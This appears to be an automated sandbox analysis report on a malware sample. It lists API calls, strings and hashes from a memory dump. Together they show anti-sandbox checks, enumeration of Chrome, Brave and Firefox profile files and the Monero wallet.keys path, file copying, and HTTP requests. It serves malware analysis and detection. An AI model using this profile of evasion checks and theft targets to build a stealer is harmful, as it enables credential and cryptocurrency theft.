                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 9082fe51dbc1150998e17c5d3bdf227573a62077df81d7862961add7d46ee389
                        • Instruction ID: 6a4913a3a4ee56f756ab197d9da5b72ffbbebe96f0d5158a9bb5bcbf2e0631d2
                        • Opcode Fuzzy Hash: 9082fe51dbc1150998e17c5d3bdf227573a62077df81d7862961add7d46ee389
                        • Instruction Fuzzy Hash: E831527190020A9ADB28F7F4DC5AFEE7F78BF84340F00451BF542A2282DF705541D6A6

                        Control-flow Graph

                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005C123E
                        • __aulldiv.LIBCMT ref: 005C1258
                        • __aulldiv.LIBCMT ref: 005C1266
                        • ExitProcess.KERNEL32 ref: 005C1294
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 9feb2fc88d4b36707287b33d43b5f9b842785e560f02123f99c55d1d2c7b389c
                        • Instruction ID: 5c950a1cdf0b7f9104a59b85d27b7fe20b2b8fc1daeb4f2696553dfeffab30fe
                        • Opcode Fuzzy Hash: 9feb2fc88d4b36707287b33d43b5f9b842785e560f02123f99c55d1d2c7b389c
                        • Instruction Fuzzy Hash: 6A014BB4940308AEEB20EBE4CC49FAEBF78BB45701F208049E605B6282D67455818799

                        Control-flow Graph

                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005D6AF9
                        • Sleep.KERNEL32(00001770), ref: 005D6B04
                        • CloseHandle.KERNEL32(?,00000000,?,014A8C28,?,005E110C,?,00000000,?,005E1110,?,00000000,005E0AEF), ref: 005D6B1A
                        • ExitProcess.KERNEL32 ref: 005D6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: a6fcd2f000cf6b1a00c9599e9656d66ae94788e6b448cf23764058d0ea306761
                        • Instruction ID: d41ee2c47bf5f128532e07fc9a416dd917ca1f46d4006c2f991b524648b91e77
                        • Opcode Fuzzy Hash: a6fcd2f000cf6b1a00c9599e9656d66ae94788e6b448cf23764058d0ea306761
                        • Instruction Fuzzy Hash: 47F03A3094031AAAEB60ABA89C0ABBE7E74FB04701F108917B552A13D1DBB05542D656

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 0122a8f9a4f9e99602812fb91172345d558c5be027fd32afd8ecce6af19d5d62
                        • Instruction ID: 3051d5b3eab816cf40192462daeaa71ec75c17faadde136665eb0efabeeb5a6f
                        • Opcode Fuzzy Hash: 0122a8f9a4f9e99602812fb91172345d558c5be027fd32afd8ecce6af19d5d62
                        • Instruction Fuzzy Hash: 4B210EB1D00209ABDF14DFA4E849ADE7B75FB45320F108626F955A72D0EB706A09CB91

                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C6280: InternetOpenA.WININET(005E0DFE,00000001,00000000,00000000,00000000), ref: 005C62E1
                          • Part of subcall function 005C6280: StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6303
                          • Part of subcall function 005C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C6335
                          • Part of subcall function 005C6280: HttpOpenRequestA.WININET(00000000,GET,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C6385
                          • Part of subcall function 005C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005C63BF
                          • Part of subcall function 005C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005C63D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005D5228
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 9961c10b14ec883463a4b763c23496f47b5ac78fdc238ab52e5842a224c818fc
                        • Instruction ID: 4b9f7bafa06d655eac075d518b156145c92ebaf7b0fa267707b93e9ccdfdd39a
                        • Opcode Fuzzy Hash: 9961c10b14ec883463a4b763c23496f47b5ac78fdc238ab52e5842a224c818fc
                        • Instruction Fuzzy Hash: F1113730900549ABCB24FF78DD5AEEE7B38BF90300F40455BF80A56292EF30AB05C655
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 005D792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 582c7cce5b4226eab5fada319362ebe8905d6a7d1568bbd697d37c21736908df
                        • Instruction ID: 38b616a67557aed78acc41f7989e7fd9bee834a5efdae10ad245ff00115fa58c
                        • Opcode Fuzzy Hash: 582c7cce5b4226eab5fada319362ebe8905d6a7d1568bbd697d37c21736908df
                        • Instruction Fuzzy Hash: 1D0162B1944308EBC754DF99DD45BAEBBB8F704B21F10422BE545A2380D37559008BA1
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005C112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 005C1132
                        • ExitProcess.KERNEL32 ref: 005C1143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 7840be79c25533bf99f70daf02398af62b3ffc9e6b979ddea7ffa7dfe94d823e
                        • Instruction ID: 2aefb516ae61910127a9f9d855f97bfb8fca6d290966aedc98d2998632b0534a
                        • Opcode Fuzzy Hash: 7840be79c25533bf99f70daf02398af62b3ffc9e6b979ddea7ffa7dfe94d823e
                        • Instruction Fuzzy Hash: 7AE0E67094530CFFE7546BE09C0EF097A78FB05B01F104054F709765D1D6B56640969D
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005C10B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005C10F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 7cbeaa21daf0ef96239c35ff2433d02f6ef468e84be8e1f486e1f7a964c1cd2f
                        • Instruction ID: 9581d0087a47889db32ffca7f3159c50b8613af3d89c038548fc876b3e08e6f7
                        • Opcode Fuzzy Hash: 7cbeaa21daf0ef96239c35ff2433d02f6ef468e84be8e1f486e1f7a964c1cd2f
                        • Instruction Fuzzy Hash: 4CF0E271641308BBE7149BA8AC5DFBABBECF705B15F305448F544E3280D5719F00CAA5
                        APIs
                          • Part of subcall function 005D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7910
                          • Part of subcall function 005D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005D7917
                          • Part of subcall function 005D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005D792F
                          • Part of subcall function 005D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005C11B7), ref: 005D7880
                          • Part of subcall function 005D7850: RtlAllocateHeap.NTDLL(00000000), ref: 005D7887
                          • Part of subcall function 005D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005D789F
                        • ExitProcess.KERNEL32 ref: 005C11C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 5e63a06c775bb3996704bbe3065eac787109728a8e84a53843366e1a59ae493a
                        • Instruction ID: 8bc5def5b4e8317a175e063f7df4357a43f9ff5e2d373d7ebe62dce03ef8bed0
                        • Opcode Fuzzy Hash: 5e63a06c775bb3996704bbe3065eac787109728a8e84a53843366e1a59ae493a
                        • Instruction Fuzzy Hash: E4E012B591430657CA6473F8AC1EF2A3A9C7B55749F08042BFA05D2743FA29E800C56A
                        APIs
                        • wsprintfA.USER32 ref: 005D38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D38E3
                        • lstrcat.KERNEL32(?,?), ref: 005D3935
                        • StrCmpCA.SHLWAPI(?,005E0F70), ref: 005D3947
                        • StrCmpCA.SHLWAPI(?,005E0F74), ref: 005D395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D3C67
                        • FindClose.KERNEL32(000000FF), ref: 005D3C7C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 809e56dd172ee83d748b1cdeeb46f7a5582e48d1ebbab0fe175cf400369cfb0a
                        • Instruction ID: 85570706b40dd094eed60c605e550a97e95adc8ec8b730cead1895de3f223952
                        • Opcode Fuzzy Hash: 809e56dd172ee83d748b1cdeeb46f7a5582e48d1ebbab0fe175cf400369cfb0a
                        • Instruction Fuzzy Hash: 7DA161B2A003099BDB74DFA4DC89FEE7778BF84300F04459AA55D96241EB719B84CF62
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,005E0B32,005E0B2B,00000000,?,?,?,005E13F4,005E0B2A), ref: 005CBEF5
                        • StrCmpCA.SHLWAPI(?,005E13F8), ref: 005CBF4D
                        • StrCmpCA.SHLWAPI(?,005E13FC), ref: 005CBF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CC7BF
                        • FindClose.KERNEL32(000000FF), ref: 005CC7D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 87f8c377e237251298e87c588b8c25db8498e5ec5eb3c0465c95e7d68d002c64
                        • Instruction ID: ced39297e5830989829e35be0d7400e6b3312986573e5802016ccf152377d137
                        • Opcode Fuzzy Hash: 87f8c377e237251298e87c588b8c25db8498e5ec5eb3c0465c95e7d68d002c64
                        • Instruction Fuzzy Hash: 4F4268729001055BCF24FBB4DD9AEEE7B7CBBC4300F40455AF90A96281EE349B49CB96
                        APIs
                        • wsprintfA.USER32 ref: 005D492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D4943
                        • StrCmpCA.SHLWAPI(?,005E0FDC), ref: 005D4971
                        • StrCmpCA.SHLWAPI(?,005E0FE0), ref: 005D4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D4B7D
                        • FindClose.KERNEL32(000000FF), ref: 005D4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 49d8ffedd40db942ea8b2cc20a1c97dd29ffc24788259fcf879fce1afec4b86e
                        • Instruction ID: 3cb1046a9cb3ddf2e4d830ffac0ae4c5d0bcdfa541edc1d06143541fc56a1a9e
                        • Opcode Fuzzy Hash: 49d8ffedd40db942ea8b2cc20a1c97dd29ffc24788259fcf879fce1afec4b86e
                        • Instruction Fuzzy Hash: 956194B2900218ABCB34EBA4DC49FEA777CBB88300F048599F54996141EB71EB85CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005D4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D4587
                        • wsprintfA.USER32 ref: 005D45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D45BD
                        • StrCmpCA.SHLWAPI(?,005E0FC4), ref: 005D45EB
                        • StrCmpCA.SHLWAPI(?,005E0FC8), ref: 005D4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D468B
                        • FindClose.KERNEL32(000000FF), ref: 005D46A0
                        • lstrcat.KERNEL32(?,014B0D70), ref: 005D46C5
                        • lstrcat.KERNEL32(?,014AF488), ref: 005D46D8
                        • lstrlen.KERNEL32(?), ref: 005D46E5
                        • lstrlen.KERNEL32(?), ref: 005D46F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 5096bc40139e92145d14796a51a95c1afc3784c4bae9df5c786f83787019982a
                        • Instruction ID: 43ee727643590e9c159cf20d1631189c9edf66a3ada0a7b6d089a4845706f45e
                        • Opcode Fuzzy Hash: 5096bc40139e92145d14796a51a95c1afc3784c4bae9df5c786f83787019982a
                        • Instruction Fuzzy Hash: 915176B55403189BCB64EBB4DC89FED777CBB54300F008599B65A92190EB74DB84CF92
                        APIs
                        • wsprintfA.USER32 ref: 005D3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D3EDA
                        • StrCmpCA.SHLWAPI(?,005E0FAC), ref: 005D3F08
                        • StrCmpCA.SHLWAPI(?,005E0FB0), ref: 005D3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D406C
                        • FindClose.KERNEL32(000000FF), ref: 005D4081
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 4f68652e2e3aefaf394e1f053f6960c7f08050d1fab9366158c9521807684744
                        • Instruction ID: 58e560abdc7d37d89d6892856b6e8116c01ab08e3bc08fc2cf1e5570268b5451
                        • Opcode Fuzzy Hash: 4f68652e2e3aefaf394e1f053f6960c7f08050d1fab9366158c9521807684744
                        • Instruction Fuzzy Hash: FB5158B5900219ABCB34FBB4DC49EEE777CBB84300F00859AB65996180DB75DB85CF91
                        APIs
                        • wsprintfA.USER32 ref: 005CED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 005CED55
                        • StrCmpCA.SHLWAPI(?,005E1538), ref: 005CEDAB
                        • StrCmpCA.SHLWAPI(?,005E153C), ref: 005CEDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CF2AE
                        • FindClose.KERNEL32(000000FF), ref: 005CF2C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 25e1dde44edeca97866024682c387afa08e5a4317a458df8277136ca70934a69
                        • Instruction ID: 01a24a894f0bf1eb53b2adb83c441f9ea9ee07c16e6c006539b611f288d77855
                        • Opcode Fuzzy Hash: 25e1dde44edeca97866024682c387afa08e5a4317a458df8277136ca70934a69
                        • Instruction Fuzzy Hash: 89E144728111599ADB68FB64CC96EEF7738BF94300F40419BB40A62192EF306F8ADF55
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005E15B8,005E0D96), ref: 005CF71E
                        • StrCmpCA.SHLWAPI(?,005E15BC), ref: 005CF76F
                        • StrCmpCA.SHLWAPI(?,005E15C0), ref: 005CF785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CFAB1
                        • FindClose.KERNEL32(000000FF), ref: 005CFAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: f0b6a953a8db65f228e1624c449aafc9671bd9d61425ac2df43f5a976b4c3317
                        • Instruction ID: 52811d2bb5d2f871c9e62244c3c41e8f5271c2e40fe8a0735223e6af268ade65
                        • Opcode Fuzzy Hash: f0b6a953a8db65f228e1624c449aafc9671bd9d61425ac2df43f5a976b4c3317
                        • Instruction Fuzzy Hash: 0DB154719001459FCB34EF64DC99FEE7B79BF94300F4085AAA80A96241EF306B49CF96
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 2>6$*"Gr$7D.8$7V?V$=Ewy$N7?$V-?$V0li$X@`V$_>w$c^O
                        • API String ID: 0-1929444058
                        • Opcode ID: 07435698134651fd486eb74240cf005b6b6a8e81d9ab5eaaf794637c647f82d2
                        • Instruction ID: d3a76ae37f36b06e5d4895297421f552755ac4752d1e36eda5e54184084246ae
                        • Opcode Fuzzy Hash: 07435698134651fd486eb74240cf005b6b6a8e81d9ab5eaaf794637c647f82d2
                        • Instruction Fuzzy Hash: 1EB227F360C2009FE3046E2DDC8567AFBE9EF94720F1A893DEAC587744EA3558058697
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005E510C,?,?,?,005E51B4,?,?,00000000,?,00000000), ref: 005C1923
                        • StrCmpCA.SHLWAPI(?,005E525C), ref: 005C1973
                        • StrCmpCA.SHLWAPI(?,005E5304), ref: 005C1989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005C1D40
                        • DeleteFileA.KERNEL32(00000000), ref: 005C1DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005C1E20
                        • FindClose.KERNEL32(000000FF), ref: 005C1E32
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: bd8d0e202273cc5618808084fcd5bd8602430a528caf8253ceae7e09c25fdcd7
                        • Instruction ID: fb0f09d9525e309d4b9a14e1b6b7ae99a66978e2eb5133ed9a378f0f93dc6414
                        • Opcode Fuzzy Hash: bd8d0e202273cc5618808084fcd5bd8602430a528caf8253ceae7e09c25fdcd7
                        • Instruction Fuzzy Hash: D01211719101599BCB29EB64CC9AEEF7B78BF94300F40419BB50662291EF306F89CF95
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,005E0C2E), ref: 005CDE5E
                        • StrCmpCA.SHLWAPI(?,005E14C8), ref: 005CDEAE
                        • StrCmpCA.SHLWAPI(?,005E14CC), ref: 005CDEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CE3E0
                        • FindClose.KERNEL32(000000FF), ref: 005CE3F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 94cf5413f6039012790f9eb69921319645f86da50c5685820fae63f2000bf0b6
                        • Instruction ID: 5e3873efbe96ca7138bc086d8e0ceaedb450cb150d5b8553bd2a4a44041a4d40
                        • Opcode Fuzzy Hash: 94cf5413f6039012790f9eb69921319645f86da50c5685820fae63f2000bf0b6
                        • Instruction Fuzzy Hash: 36F191718101599ADB29EB64CC9AEEF7738BF94300F8041DBA40A62191EF306F89DF55
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005E14B0,005E0C2A), ref: 005CDAEB
                        • StrCmpCA.SHLWAPI(?,005E14B4), ref: 005CDB33
                        • StrCmpCA.SHLWAPI(?,005E14B8), ref: 005CDB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CDDCC
                        • FindClose.KERNEL32(000000FF), ref: 005CDDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: c604059a5b17e9568b352f2e832ee843ab02110530c1a7f280cd809c70932d34
                        • Instruction ID: 2e32abef9df58cb8274e586371fd5b676be65b365542bea9edd5631025dc8e45
                        • Opcode Fuzzy Hash: c604059a5b17e9568b352f2e832ee843ab02110530c1a7f280cd809c70932d34
                        • Instruction Fuzzy Hash: 97914B729001059BCB14FBB4DC5AEEE7B7DBFC4300F40856AF90A96245EE349B49CB96
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,005E05AF), ref: 005D7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 005D7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 005D7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 005D7C62
                        • LocalFree.KERNEL32(00000000), ref: 005D7D22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: ab77f9ca7cdfbdc7658fd1fbdcae7751c369e0b55d2ca5913881977c2fe99873
                        • Instruction ID: 252824740974da9de7652f7231ba4fd4755de78db23923ab4d87223245ae1b36
                        • Opcode Fuzzy Hash: ab77f9ca7cdfbdc7658fd1fbdcae7751c369e0b55d2ca5913881977c2fe99873
                        • Instruction Fuzzy Hash: C3413E7195021DABDB24DB58DC99BEEBB74FF48700F20419BE40962291DB742F85CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
